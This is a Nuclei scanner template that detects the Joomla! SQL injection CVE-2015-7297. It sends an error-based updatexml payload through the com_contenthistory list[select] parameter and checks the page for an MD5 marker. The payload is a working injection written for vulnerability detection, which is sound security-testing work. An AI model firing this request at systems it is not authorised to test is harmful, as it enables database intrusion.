nuclei-templates/cves/2015/CVE-2015-7297.yaml

31 lines
962 B
YAML

id: CVE-2015-7297
info:
name: Joomla! Core SQL Injection
author: princechaddha
severity: high
description: A SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2015-7297
- http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
- https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/
classification:
cve-id: CVE-2015-7297
tags: cve,cve2015,joomla,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)"
matchers:
- type: word
words:
- '{{md5({{num}})}}'
part: body
# Enhanced by mp on 2022/03/02